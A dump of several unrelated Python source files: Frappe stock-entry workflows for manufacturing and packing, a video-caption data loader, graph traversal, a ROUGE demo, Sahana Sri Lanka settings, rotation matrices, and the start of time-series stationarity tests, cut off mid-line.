            if se_receipt[0]["Exception"] == "Not Occured":
                # print "se_receipt created ",se_receipt
                # print "transfer data ",trans_entity
                response.append(
                    {"Name": se_receipt[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Receipt"});
                se_transfer3 = make_transfer(trans_entity)
                if se_transfer3[0]["Exception"] == "Not Occured":
                    response.append({"Name": se_transfer3[0]["Name"], "Status": "Created",
                                     "Stock Entry Type": "Material Transfer"});
                    # return response
                    # print "se_transfer3 created ",se_transfer3
                else:
                    # Transfer failed: roll back (cancel) the issue and receipt.
                    response.append({"Name": se_transfer3[0]["Name"], "Status": "Not Created",
                                     "Stock Entry Type": "Material Transfer"});
                    doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
                    doc1.docstatus = 2
                    doc1.save()
                    doc2 = frappe.get_doc("Stock Entry", se_receipt[0]["Name"]);
                    doc2.docstatus = 2
                    doc2.save()
            else:
                # Receipt failed: roll back the issue.
                response.append(
                    {"Name": se_receipt[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Receipt"});
                doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
                doc1.docstatus = 2
                doc1.save()
        else:
            # Later process: the made items already exist in the outbound
            # warehouse, so only the transfer is needed.
            # print "se_issue created 2t:",se_issue
            # print "transfer data ",trans_entity
            se_transfer2 = make_transfer(trans_entity)
            # print "se_transfer2 created ",se_transfer2
            if se_transfer2[0]["Exception"] == "Not Occured":
                response.append(
                    {"Name": se_transfer2[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
            else:
                # Transfer failed: roll back the issue.
                response.append({"Name": se_transfer2[0]["Name"], "Status": "Not Created",
                                 "Stock Entry Type": "Material Transfer"});
                doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
                doc1.docstatus = 2
                doc1.save()
        #print(response)
    else:
        # print "se_transfer3 created ",se_transfer3
        response.append({"Name": se_issue[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Issue"});
        #print(response)
    return response
@frappe.whitelist()
def receive_material_for_manufacturing(entity):
    """Receive made items back from the subcontractor for a manufacturing step.

    Creates one Material Transfer (target/subcontractor warehouse ->
    receiving warehouse) of units_s_r * qty_made for each method item, with
    the subcontracting labour charge (rate * units) as additional cost.
    Returns a list with one {"Name", "Status", "Stock Entry Type"} dict.
    """
    entity = json.loads(entity)
    labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
    item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
                                               "item_payload_account")
    units = entity.get("units_s_r")
    location = entity.get("location");
    company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
    response = [];
    # make_transfer
    # from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
    transfer_items_list = []
    for i_row in entity.get("method_items"):
        val = i_row.get("qty_made")
        actual_qty = units * val;
        item_dic = {
            "item_code": i_row.get("item_made"),
            "qty": actual_qty,
            "uom": i_row.get("qty_uom"),
            "conversion_factor": i_row.get("conversion_factor"),
            "s_wh": entity.get("target_warehouse"),  # subcontractor wh
            "t_wh": entity.get("receiving_warehouse"),  # receiving_warehouse
            "item_payload_account": item_payload_account
        }
        transfer_items_list.append(item_dic)
    se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
    # Subcontracting labour is charged per received unit.
    se_trans_entity["add_amount"] = entity.get("subcontracting_rate") * entity.get("units_s_r")
    se_trans_entity["labour_account"] = labour_account
    se_trans_entity["isAdditionCost"] = 1
    se_transfer = create_stock_entry(se_trans_entity)
    # print(se_transfer,"-----------------------------------------------");
    if (se_transfer[0]["Exception"] == "Not Occured"):
        # response.append({"Name":se_transfer,"Status":"Created"});
        response.append({"Name": se_transfer[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
        # print(response)
        # return response
    else:
        response.append(
            {"Name": se_transfer[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Transfer"});
        # response.append({"Name":se_transfer,"Status":"Not Created"});
        # print(response)
    return response
#packing type suresh
#create issue data first.use same logic of send material for manufacturing
@frappe.whitelist()
def send_material_for_packing(entity):
    """Issue packing raw materials and transfer the items to be packed.

    For each made item in entity["multiple_method_items"]:
      1. Material Issue of that item's raw materials (matched by item_made in
         req_items) from the location's raw-material warehouse.
      2. Material Transfer of the item itself (outbound -> target warehouse),
         carrying the issue's outgoing value plus labour as additional cost.

    If any step fails, every stock entry created so far in this call is
    cancelled and processing stops (all-or-nothing).  Returns a list of
    {"Name", "Status", "Stock Entry Type"} dicts.
    """
    entity = json.loads(entity)
    response = []
    #print "entity send_material_for_packing" ,entity
    labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
    item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"item_payload_account")
    company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
    raw_material_warehouse = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"raw_material_warehouse")
    #new code start
    #on transfer and one issue for each item made .if one fails cancel all previous ones
    #store all trnsactions in a list and cancell in one go
    raw_trans_id_list =[]
    for im_row in entity.get("multiple_method_items"):
        issue_items_list = []
        #print "came inside item made ",im_row.get("item_made")
        for i_row in entity.get("req_items"):
            if im_row.get("item_made") == i_row.get("item_made") :
                #print "if passed"
                issue_item_dic = {
                    "item_code": i_row.get("item_code"),
                    "qty": i_row.get("dispatched_quantity_in_uom"),
                    "uom": i_row.get("qty_uom"),
                    "conversion_factor": i_row.get("conversion_factor"),
                    "t_wh": None,
                    "s_wh": raw_material_warehouse,
                    "item_payload_account": item_payload_account
                }
                issue_items_list.append(issue_item_dic)
        #create issue for each item made raw materials
        se_issue_entity = {"action": "Material Issue", "items_list": issue_items_list, "company": company}
        se_issue = create_stock_entry(se_issue_entity)
        transfer_items_list = []
        if se_issue[0]["Exception"] == "Not Occured":
            raw_trans_id_list.append( se_issue[0]["Name"])
            response.append({"Name": se_issue[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Issue"});
            #create transfer for each item made
            trans_item_dic = {
                "item_code": im_row.get("item_made"),
                "qty": im_row.get("units_s_r"),
                "uom": im_row.get("qty_uom"),
                "conversion_factor": im_row.get("conversion_factor"),
                "s_wh": entity.get("outbound_warehouse"),
                "t_wh": entity.get("target_warehouse"),
                "item_payload_account": item_payload_account
            }
            transfer_items_list.append(trans_item_dic)
            se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
            # The issue's outgoing value rides on the transfer as extra cost.
            se_trans_entity["add_amount"] = frappe.db.get_value("Stock Entry", {"name": se_issue[0]["Name"]},"total_outgoing_value")
            se_trans_entity["labour_account"] = labour_account  # only for send material for manufacturing
            se_trans_entity["isAdditionCost"] = 1
            se_transfer2 = create_stock_entry(se_trans_entity)
            if se_transfer2[0]["Exception"] == "Not Occured":
                raw_trans_id_list.append(se_transfer2[0]["Name"])
                response.append({"Name": se_transfer2[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
            else:
                # Transfer failed: cancel everything created so far and stop.
                cancel_raw_transactions(raw_trans_id_list)
                response.append({"Name": se_transfer2[0]["Name"], "Status": "Not Created","Stock Entry Type": "Material Transfer"});
                break
        else:
            # Issue failed: cancel everything created so far and stop.
            cancel_raw_transactions(raw_trans_id_list)
            response.append({"Name": se_issue[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Issue"});
            break
    #new code end
    return response
def cancel_raw_transactions(raw_trans_id_list):
    """Cancel (docstatus=2) every Stock Entry named in `raw_trans_id_list`."""
    for entry_name in raw_trans_id_list:
        stock_entry = frappe.get_doc('Stock Entry', {'name': entry_name})
        if not stock_entry:
            frappe.throw("No such un-cancelled document")
        stock_entry.docstatus = 2
        stock_entry.save()
@frappe.whitelist()
def receive_material_from_packing(entity):
    """Receive packed items back from the packer, one transfer per item.

    For each row in entity["multiple_method_items"], creates a Material
    Transfer (target/subcontractor warehouse -> receiving warehouse) of the
    row's units_s_r, with the row's packing_labour_amount as additional
    cost.  If any transfer fails, every transfer created earlier in this
    call is cancelled and processing stops.  Returns a list of
    {"Name", "Status", "Stock Entry Type"} dicts.
    """
    entity = json.loads(entity)
    #print "receive_material_from_packing",entity
    labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
    item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
                                               "item_payload_account")
    units = entity.get("units_s_r")
    location = entity.get("location");
    company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
    response = [];
    # make_transfer
    # from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
    raw_trans_id_list = []
    for i_row in entity.get("multiple_method_items"):
        transfer_items_list = []
        item_dic = {
            "item_code": i_row.get("item_made"),
            "qty": i_row.get("units_s_r"),
            "uom": i_row.get("qty_uom"),
            "conversion_factor": i_row.get("conversion_factor"),
            "s_wh": entity.get("target_warehouse"),  # subcontractor wh
            "t_wh": entity.get("receiving_warehouse"),  # receiving_warehouse
            "item_payload_account": item_payload_account
        }
        transfer_items_list.append(item_dic)
        se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
        se_trans_entity["add_amount"] = i_row.get("packing_labour_amount")
        se_trans_entity["labour_account"] = labour_account
        se_trans_entity["isAdditionCost"] = 1
        se_transfer = create_stock_entry(se_trans_entity)
        # print(se_transfer,"-----------------------------------------------");
        if (se_transfer[0]["Exception"] == "Not Occured"):
            raw_trans_id_list.append(se_transfer[0]["Name"])
            response.append( {"Name": se_transfer[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
        else: #need to cancel previous transactions if any one failed to create
            cancel_raw_transactions(raw_trans_id_list)
            response.append({"Name": se_transfer[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Transfer"});
            break
    # response.append({"Name":se_transfer,"Status":"Not Created"});
    # print(response)
    return response
#packing type
def make_transfer(trans_entity):
    """Build and submit a Material Transfer for the method (made) items.

    Each item is transferred from trans_entity["s_wh"] to trans_entity["t_wh"]
    with qty = units_to_be_sr * qty_made; trans_entity["add_amount"] is
    attached as additional cost.  Returns create_stock_entry's status list.
    """
    transfer_items_list = []
    units = trans_entity.get("units_to_be_sr");
    company = trans_entity.get("company")
    for i_row in trans_entity.get("items"):
        val = i_row.get("qty_made")
        actual_qty = units * val;
        item_dic = {
            "item_code": i_row.get("item_made"),
            "qty": actual_qty,
            "uom": i_row.get("qty_uom"),
            "conversion_factor": i_row.get("conversion_factor"),
            "s_wh": trans_entity.get("s_wh"),
            "t_wh": trans_entity.get("t_wh"),
            "item_payload_account": trans_entity.get("item_payload_account")
        }
        transfer_items_list.append(item_dic)
    se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
    se_trans_entity["add_amount"] = trans_entity.get("add_amount")
    # NOTE(review): the additional-cost account is taken from
    # item_payload_account here even though callers also supply a
    # labour_account key -- the original comment suggests this is deliberate
    # for send_material_for_manufacturing, but confirm which account the
    # labour cost should hit.
    se_trans_entity["labour_account"] = trans_entity.get(
        "item_payload_account")  # only for send material for manufacturing
    se_trans_entity["isAdditionCost"] = 1
    se_transfer = create_stock_entry(se_trans_entity)
    return se_transfer
@frappe.whitelist()
def create_stock_entry(se_entity):
    """Create and submit a Stock Entry from a plain dict description.

    se_entity keys:
        action: "Material Issue" | "Material Receipt" | "Material Transfer"
            (controls which of s_wh/t_wh each item row sets).
        items_list: rows with item_code/qty/uom/conversion_factor, s_wh/t_wh
            and item_payload_account (used as the row's expense account).
        company: owning company.
        isAdditionCost / labour_account / add_amount: optional additional
            cost attached to the entry.

    Returns a one-element list [{"Name", "Exception"}], Exception being
    "Not Occured" on success.  On failure the partially created entry is
    deleted and "Occured" is returned instead of raising.
    """
    #print "from create_stock_entry se_entity :",se_entity
    # test
    status = []
    try:
        se = frappe.new_doc("Stock Entry")
        se.purpose = se_entity.get("action")
        se.stock_entry_type = se_entity.get("action")
        se.company = se_entity.get("company")
        se.set('items', [])
        for item in se_entity.get("items_list"):
            se_item = se.append('items', {})
            se_item.item_code = item["item_code"]
            se_item.qty = item["qty"]
            se_item.uom = item["uom"]
            se_item.conversion_factor = item["conversion_factor"]
            se_item.expense_account = item["item_payload_account"]  # dif acc
            se_item.stock_uom = frappe.db.get_value("Item", {"name": item["item_code"]}, "stock_uom")
            se_item.basic_rate = 0.01
            if se_entity.get("action") == "Material Transfer":
                se_item.s_warehouse = item["s_wh"]
                se_item.t_warehouse = item["t_wh"]
            if se_entity.get("action") == "Material Issue":
                se_item.s_warehouse = item["s_wh"]
            if se_entity.get("action") == "Material Receipt":
                se_item.t_warehouse = item["t_wh"]
        if se_entity.get("isAdditionCost"):
            se.set('additional_costs', [])
            se_add_cost = se.append('additional_costs', {})
            se_add_cost.description = "Manufacturing Record"
            se_add_cost.expense_account = se_entity.get("labour_account")
            se_add_cost.amount = se_entity.get("add_amount")
        se.save(ignore_permissions=True)
        se.submit()
        frappe.db.commit()
        status.append({"Name": se.name, "Exception": "Not Occured"});
    except Exception as e:
        # NOTE(review): if frappe.new_doc itself fails, `se` is unbound and
        # this handler raises NameError -- confirm whether that can happen.
        status.append({"Name": se.name, "Exception": "Occured", "Exception type": e});
        frappe.delete_doc("Stock Entry", se.name)
    return status
# ability to create purchase invoice in future
@frappe.whitelist()
def get_method_based_on_item(item_made):
    """Return the names of all manufacturing methods that produce `item_made`.

    Simplification: the original special-cased a single-row result with
    `method_list[0]["parent"]` and otherwise used `method.parent`; frappe
    rows (frappe._dict) expose columns both ways, so one comprehension
    covers every length.
    """
    method_list = frappe.db.sql(
        """select parent from `tabPch Manufacturing Method Child` where item_made=%s""",
        (item_made), as_dict=1)
    return [row["parent"] for row in method_list]
@frappe.whitelist()
def cancel_s_entries(mat_issue, mat_receipt, mat_transfer):
    """Cancel the issue, receipt and transfer Stock Entries of one record.

    All three documents are fetched up front (so a missing name fails before
    anything is cancelled), then each is set to docstatus=2 and saved.
    """
    docs = [frappe.get_doc("Stock Entry", name)
            for name in (mat_issue, mat_receipt, mat_transfer)]
    for doc in docs:
        if doc:
            doc.docstatus = 2
            doc.save()
    return "SE deleted"
@frappe.whitelist()
def cancel_single_se(mat_transfer):
    """Cancel a single Stock Entry by name."""
    stock_entry = frappe.get_doc("Stock Entry", mat_transfer)
    if stock_entry:
        stock_entry.docstatus = 2
        stock_entry.save()
    return "Single SE deleted"
@frappe.whitelist()
def move_material_internally(entity):
    """Move made items between two warehouses at the same location.

    Creates one Material Transfer (outbound -> receiving warehouse) of
    units_s_r * qty_made for each method item, with no additional cost.
    Returns a one-element list [{"Name", "Status"}] (Name holds the whole
    create_stock_entry status list).
    """
    entity = json.loads(entity)
    units = entity.get("units_s_r")
    labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
    item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"item_payload_account")
    location = entity.get("location");
    company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
    response = [];
    # make_transfer
    # from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
    transfer_items_list = []
    for i_row in entity.get("method_items"):
        val = i_row.get("qty_made");
        total_qty = units * val;
        item_dic = {
            "item_code": i_row.get("item_made"),
            "qty": total_qty,
            "uom": i_row.get("qty_uom"),
            "conversion_factor": i_row.get("conversion_factor"),
            "s_wh": entity.get("outbound_warehouse"),
            "t_wh": entity.get("receiving_warehouse"),
            "item_payload_account": item_payload_account
        }
        transfer_items_list.append(item_dic)
    se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
    se_transfer = create_stock_entry(se_trans_entity)
    #print(se_trans_entity);
    #print(se_transfer)
    if (se_transfer[0]["Exception"] == "Not Occured"):
        response.append({"Name": se_transfer, "Status": "Created"});
        #print(response)
        return response
    else:
        response.append({"Name": se_transfer, "Status": "Not Created"});
        #print(response)
        return response
@frappe.whitelist()
def change_doc_status(name):
    """Cancel a Pch Manufacturing Record that is not already cancelled.

    Fetches the record with docstatus < 2, sets docstatus=2 and saves; throws
    when no such uncancelled record exists.  Returns "draft mode".

    FIX: the original `return` line had extraction junk fused onto it
    (` | StarcoderdataPython |`), which is a syntax error; restored the
    clean return statement.
    """
    doc = frappe.get_doc('Pch Manufacturing Record', {'name': name, 'docstatus': ('<', 2)})
    if (doc):
        doc.docstatus = 2
        doc.save()
    else:
        frappe.throw("No such un-cancelled document")
    return "draft mode"
3388262 | #!/usr/bin/env python3
'''
Utilities for the video data loading pipeline.
Assumes that videos are already downloaded and preprocessed.
'''
from __future__ import division
import numpy as np
import csv,pickle,os
from glob import glob
from config import *
def _to_absolute_path(fn):
    """Convert a timestamped filename to the absolute path of its .npy file.

    The last 10 characters of `fn` are the timestamp suffix; the directory
    name is the filename without that suffix, rooted at VIDEO_ROOT.
    """
    video_dir = os.path.join(VIDEO_ROOT, fn[:-10])
    return os.path.join(video_dir, '{}.npy'.format(fn))
# --- Build or load the (video path, padded caption) dictionary ---
if os.path.isfile(VIDEO_DICT):
    # Cached dictionary exists; the word index must exist alongside it.
    assert os.path.isfile(WORD_INDEX_FILE)
    print('Loading Video Dictionary...', end='')
    video_dict = np.load(VIDEO_DICT)
    with open(WORD_INDEX_FILE, 'rb') as f:
        inverted_index = pickle.load(f)
    print('done.')
else:
    print('Generating Video Dictionary...',end='')
    from tensorflow.contrib.keras.python.keras.preprocessing.text import *
    # Each MSVD row becomes [absolute video path, "SOS <caption> EOS"].
    with open(MSVD_PATH, encoding='utf8') as f:
        r = csv.DictReader(f)
        video_dict = np.array([[_to_absolute_path(row['Filename']),'SOS {} EOS'.format(row['Description'])] for row in r])
    video_dict = np.unique(video_dict, axis=0)
    # preprocess text and create index file
    _docs = video_dict[:,1]
    tk = Tokenizer()
    tk.fit_on_texts(_docs)
    # Drop captions outside the allowed token-length window, then shuffle.
    _lengths = np.array([len(x) for x in tk.texts_to_sequences_generator(_docs)])
    video_dict = video_dict[(_lengths > SENTENCE_MIN_LENGTH)*(_lengths <= SENTENCE_MAX_LENGTH)]
    video_dict = video_dict[np.random.permutation(video_dict.shape[0])] # shuffle
    # Re-fit the tokenizer on the filtered captions only.
    _docs = video_dict[:,1]
    tk = Tokenizer()
    tk.fit_on_texts(_docs)
    train_text = np.array([np.array(x) for x in tk.texts_to_sequences_generator(_docs)])
    inverted_index = {v:k for (k,v) in tk.word_index.items()}
    with open(WORD_INDEX_FILE, 'wb') as f:
        pickle.dump(inverted_index, f)
    ## word_docs = tk.word_docs
    ## word_counts = tk.word_counts
    ## document_count = tk.document_count
    # Zero-pad every caption to SENTENCE_MAX_LENGTH tokens.
    _txt = np.zeros(train_text.shape+(SENTENCE_MAX_LENGTH,), dtype=int)
    for i in range(_txt.shape[0]):
        _txt[i,:train_text[i].shape[0]] = train_text[i]
    train_text = _txt
    train_video = video_dict[:,0]
    video_dict = np.column_stack([train_video,_txt])
    np.save(VIDEO_DICT, video_dict)
    # To recover:
    # train_video = video_dict[:,0]
    # train_text = video_dict[:,1:].astype(int)
    print('done.')
VOCABULARY_SIZE = len(inverted_index) + 1 # add 1 for the null element
# Split the unique video files into train/test partitions by TEST_RATIO.
_vids = np.unique(video_dict[:,0])
_num_test_vids = int(round(TEST_RATIO * _vids.shape[0]))
_num_train_vids = _vids.shape[0] - _num_test_vids
# --- Load (or build and cache) the video frame arrays ---
if os.path.isfile(VIDEO_FILE):
    print('Loading videos from {}...'.format(VIDEO_FILE),end='')
    videos = np.load(VIDEO_FILE)
    print('done.')
else:
    print('Loading videos from {}...'.format(VIDEO_ROOT),end='')
    videos = np.array([np.load(fn) for fn in _vids])
    print('done.')
    print('Saving videos to disk...',end='')
    np.save(VIDEO_FILE,videos)
    print('done.')
frame_counts = np.array([video.shape[0] for video in videos])
# bimodal train/test splits
train_dict = video_dict[np.where(np.isin(video_dict[:,0],_vids[:_num_train_vids]))]
test_dict = video_dict[np.where(np.isin(video_dict[:,0],_vids[_num_train_vids:]))]
# unimodal train/test splits
train_videos = videos[:_num_train_vids]
test_videos = videos[_num_train_vids:]
train_text = np.unique(train_dict[:,1:].astype(int),axis=0)
test_text = np.unique(test_dict[:,1:].astype(int),axis=0)
def index_to_words(sequences):
    """Turn a ragged array of word indices into an array of word arrays.

    Indices missing from the vocabulary (e.g. the 0 padding) are dropped.
    """
    decoded = []
    for seq in sequences:
        words = [inverted_index[idx] for idx in seq if idx in inverted_index]
        decoded.append(np.array(words))
    return np.array(decoded)
def index_to_strings(sequences, sos_included=True):
    """Turn a ragged array of word indices into an array of sentence strings.

    The leading SOS token (when `sos_included`) and everything from the
    first EOS token onward are stripped.
    """
    start = 1 if sos_included else 0
    strings = []
    for words in index_to_words(sequences):
        if 'eos' in words:
            stop = np.argmax(words == 'eos')
        else:
            stop = words.shape[0]
        strings.append(' '.join(words[start:stop]))
    return np.array(strings)
def get_video(fn):
    '''Return the pre-loaded video array whose source filename equals `fn`.'''
    match = np.where(_vids == fn)
    return videos[match][0]
if __name__ == '__main__':
    # show some data for human validation
    import cv2
    _bs = 8  # number of (video, caption) examples to preview
    _val_dict = video_dict
    _val_dict = _val_dict[np.random.permutation(_val_dict.shape[0])] # shuffle
    _s = np.random.randint(_val_dict.shape[0]-_bs)  # random contiguous window start
    batch = _val_dict[_s:_s+_bs]
    _per = 167 // 2  # cv2.waitKey delay per frame, in ms (~12 fps playback)
    for example in batch:
        fn = example[0]                 # column 0 holds the video file path
        text = example[1:].astype(int)  # remaining columns: padded word-index caption
        print(index_to_strings(text[np.newaxis],True)[0])
        video = get_video(fn)
        for frame in video:
            cv2.imshow('video',cv2.resize(frame,(640,380)))
            cv2.waitKey(_per)
| StarcoderdataPython |
1930059 | from collections import deque
import sys
read = sys.stdin.readline  # fast line-based input
# n = vertex count, m = edge count, start = traversal start vertex
n, m, start = map(int, read().split())
v = [[] for _ in range(n + 1)]  # adjacency lists (vertices are 1-indexed)
for i in range(m):
    v1, v2 = map(int, read().split())
    # undirected graph: record the edge in both directions
    v[v1].append(v2)
    v[v2].append(v1)
for i in range(n + 1):
    v[i].sort()  # so neighbours are explored in ascending order
# --- DFS (iterative, preorder) ---
visited = [False] * (n+1)
res = []
stack = []
stack.append(start)
while stack:
    v1 = stack.pop()
    if not visited[v1]:
        visited[v1] = True
        res.append(str(v1))
        # reversed() so the smallest-numbered neighbour is popped first
        stack += reversed(v[v1])
print(" ".join(res))
# --- BFS ---
visited = [False] * (n+1)
res = []
queue = deque()
queue.append(start)
while queue:
    # drains one level per outer iteration (not required for correctness here)
    for _ in range(len(queue)):
        v1 = queue.popleft()
        if not visited[v1]:
            visited[v1] = True
            res.append(str(v1))
            # visited vertices may be re-enqueued; the check above discards them
            queue += v[v1]
print(" ".join(res))
| StarcoderdataPython |
383579 | <reponame>HCDM/XRec
from rouge import Rouge
# Demo: score a hypothesis summary against a reference with py-rouge.
# Two identical pairs are used purely to exercise avg scoring; '####'/'#'
# appear to be number masks from the original summarisation corpus.
hypothesis = ["the #### transcript is a written version of each day 's cnn student news program use this transcript to help students with reading comprehension and vocabulary use the weekly newsquiz to test your knowledge of storie s yousaw on cnn student news" for i in range(2)]
reference = ["this page includes the show transcript use the transcript to help students with reading comprehension and vocabulary at the bottom of the page , comment for a chance to be mentioned on cnn student news . you must be a teacher or a student age # # or older to request a mention on the cnn student news roll call . the weekly newsquiz tests students ' knowledge of even ts in the news" for i in range(2)]
print("=="*10)
print("hypothesis", " ".join(hypothesis))
print("=="*10)
print("reference", ". ".join(reference))
rouge = Rouge()
# avg=True collapses per-pair scores into a single mean score dict
scores = rouge.get_scores(hypothesis, reference, avg=True)
print("scores", scores)
# ROUGE-1 F1 is the headline number
print(scores["rouge-1"]["f"])
4903263 | # -*- coding: utf-8 -*-
from collections import OrderedDict
from gluon import current, URL
from gluon.storage import Storage
def config(settings):
    """
    SHARE settings for Sri Lanka

    Template-level customisations applied on top of the base SHARE template:
    Sri-Lanka prepop data, Sinhala/Tamil localisation, LKR/USD currencies and
    a customised event_event resource.

    @ToDo: Setting for single set of Sectors / Sector Leads Nationally
    """
    T = current.T
    # PrePopulate data
    settings.base.prepopulate += ("SHARE/LK",)
    settings.base.prepopulate_demo += ("SHARE/Demo",)
    # -------------------------------------------------------------------------
    # L10n (Localization) settings
    settings.L10n.languages = OrderedDict([
        ("en-gb", "English"),
        ("si", "Sinhala"),
        ("ta", "Tamil"),
    ])
    # Default Language
    settings.L10n.default_language = "en-gb"
    # Finance settings
    settings.fin.currencies = {
        #"EUR" : "Euros",
        #"GBP" : "Great British Pounds",
        "LKR" : "Sri Lanka Rupees",
        "USD" : "United States Dollars",
    }
    settings.fin.currency_default = "USD"
    # -------------------------------------------------------------------------
    def customise_event_event_resource(r, tablename):
        """
        Customise event_event: relabel the title field, attach per-language
        (Sinhala/Tamil) name components plus a linked needs component, and
        install a custom CRUD form with inline translations and location.
        """
        s3db = current.s3db
        s3db.event_event.name.label = T("Disaster Title")
        # Custom Components
        s3db.add_components(tablename,
                            event_event_name = (# Sinhala
                                                {"name": "name_si",
                                                 "joinby": "event_id",
                                                 "filterby": {"language": "si",
                                                              },
                                                 "multiple": False,
                                                 },
                                                # Tamil
                                                {"name": "name_ta",
                                                 "joinby": "event_id",
                                                 "filterby": {"language": "ta",
                                                              },
                                                 "multiple": False,
                                                 },
                                                ),
                            need_need = {"link": "need_event",
                                         "joinby": "event_id",
                                         "key": "need_id",
                                         "actuate": "hide",
                                         "autodelete": False,
                                         },
                            )
        from s3 import S3SQLCustomForm, S3SQLInlineComponent
        crud_form = S3SQLCustomForm("name",
                                    S3SQLInlineComponent("name_si",
                                                         label = T("Title in Sinhala"),
                                                         multiple = False,
                                                         fields = [("", "name_l10n")],
                                                         ),
                                    S3SQLInlineComponent("name_ta",
                                                         label = T("Title in Tamil"),
                                                         multiple = False,
                                                         fields = [("", "name_l10n")],
                                                         ),
                                    "event_type_id",
                                    "start_date",
                                    "closed",
                                    "end_date",
                                    S3SQLInlineComponent("event_location",
                                                         label = T("Locations"),
                                                         multiple = False,
                                                         fields = [("", "location_id")],
                                                         ),
                                    "comments",
                                    )
        s3db.configure(tablename,
                       crud_form = crud_form,
                       )
    settings.customise_event_event_resource = customise_event_event_resource
# END =========================================================================
| StarcoderdataPython |
390805 | import numpy as np
def rotation_about(axis, angle):
    """Return the 3x3 right-handed rotation matrix about `axis` by `angle` degrees.

    axis  : 'x', 'y' or 'z'
    angle : rotation angle in degrees (counter-clockwise looking down the axis
            towards the origin)

    Raises ValueError for any other axis name.

    Fix: the y-axis matrix previously had its sine terms transposed, which
    rotated by -angle (left-handed) while 'x' and 'z' used the right-handed
    convention.
    """
    cth = np.cos(np.deg2rad(angle))
    sth = np.sin(np.deg2rad(angle))
    if axis == 'x':
        return np.array([[1, 0, 0], [0, cth, -sth], [0, sth, cth]])
    elif axis == 'y':
        return np.array([[cth, 0, sth], [0, 1, 0], [-sth, 0, cth]])
    elif axis == 'z':
        return np.array([[cth, -sth, 0], [sth, cth, 0], [0, 0, 1]])
    else:
        raise ValueError('Unrecognised axis')
def rotation_list(rots):
    """Compose a sequence of rotations.

    `rots` is an iterable of (axis, angle_degrees) pairs; the first pair is
    applied first to a column vector (matrices are left-multiplied in order).
    """
    matrices = [rotation_about(axis, angle) for axis, angle in rots]
    composed = np.eye(3)
    for m in matrices:
        composed = m @ composed
    return composed
11305299 | # import libraries
import pandas as pd
import matplotlib.pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import adfuller, kpss
from statsmodels.tools.sm_exceptions import InterpolationWarning
import warnings
# settings
warnings.filterwarnings('ignore', '.*output shape of zoom.*')
warnings.simplefilter(action='ignore', category=InterpolationWarning)
plt.style.use('seaborn')
def adf_test(x):
    '''
    Run the Augmented Dickey-Fuller stationarity test.

    Null Hypothesis: the series is not stationary
    Alternate Hypothesis: the series is stationary

    Parameters
    ----------
    x : pd.Series / np.array
        The time series to be checked for stationarity

    Returns
    -------
    results : pd.Series
        Test statistic, p-value, lag/observation counts and critical values
    '''
    output = adfuller(x, autolag='AIC')
    labels = ['Test Statistic', 'p-value',
              '# of Lags Used', '# of Observations Used']
    results = pd.Series(list(output[:4]), index=labels)
    for level, threshold in output[4].items():
        results[f'Critical Value ({level})'] = threshold
    return results
def kpss_test(x, h0_type='c'):
    '''
    Run the Kwiatkowski-Phillips-Schmidt-Shin stationarity test.

    Null Hypothesis: the series is stationary
    Alternate Hypothesis: the series is not stationary

    Parameters
    ----------
    x : pd.Series / np.array
        The time series to be checked for stationarity
    h0_type : str {'c', 'ct'}
        Null hypothesis of the KPSS test:
        * 'c': the data is stationary around a constant (default)
        * 'ct': the data is stationary around a trend

    Returns
    -------
    results : pd.Series
        Test statistic, p-value, lag count and critical values
    '''
    output = kpss(x, regression=h0_type)
    results = pd.Series(list(output[:3]),
                        index=['Test Statistic', 'p-value', '# of Lags'])
    for level, threshold in output[3].items():
        results[f'Critical Value ({level})'] = threshold
    return results
def test_autocorrelation(x, n_lags=40, alpha=0.05, h0_type='c'):
    '''
    Check the stationarity of a series using the ADF test, the KPSS test
    and ACF/PACF plots.

    Parameters
    ----------
    x : pd.Series / np.array
        The time series to inspect
    n_lags : int
        Number of lags for the ACF/PACF plots
    alpha : float
        Significance level for the ACF/PACF confidence bands
    h0_type : str {'c', 'ct'}
        Null hypothesis flavour forwarded to the KPSS test

    Returns
    -------
    fig : matplotlib.figure.Figure
        Figure with the ACF plot on top and the PACF plot below
    '''
    adf_results = adf_test(x)
    kpss_results = kpss_test(x, h0_type=h0_type)
    adf_msg = 'ADF test statistic: {:.2f} (p-val: {:.2f})'.format(
